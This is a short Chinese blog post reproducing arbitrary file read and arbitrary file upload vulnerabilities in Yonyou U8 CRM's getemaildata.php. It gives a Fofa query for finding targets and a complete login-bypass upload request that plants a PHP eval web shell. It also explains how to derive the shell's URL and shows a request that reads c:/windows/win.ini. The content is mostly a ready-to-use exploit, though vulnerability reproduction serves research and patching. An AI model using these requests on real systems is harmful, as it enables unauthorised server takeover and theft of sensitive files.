用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞

漏洞简介

用友U8 CRM客户管理系统getemaildata.php存在任意文件读取漏洞，攻击者通过漏洞可以获取到服务器中的敏感文件。
用友U8 CRM客户关系管理系统getemaildata.php文件存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。
Fofa：body="用友U8CRM"
登录界面

文件上传漏洞复现

POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykS5RKgl8t3nwInMQ

------WebKitFormBoundarykS5RKgl8t3nwInMQ
Content-Disposition: form-data; name="file"; filename="test.php "
Content-Type: text/plain

<?php @eval($_POST['hack']);?>

------WebKitFormBoundarykS5RKgl8t3nwInMQ

返回数据包

将mht后面的字符转化为16进制，然后减一，在转化回字符

访问：http://your-ip/tmpfile/upd十六进制减一.tmp.php

文件读取漏洞复现
访问http://xxxx/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

posted @ 2024-03-19 08:42 kalixcn 阅读(209) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

kalixcn

用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞

漏洞简介

文件上传漏洞复现

公告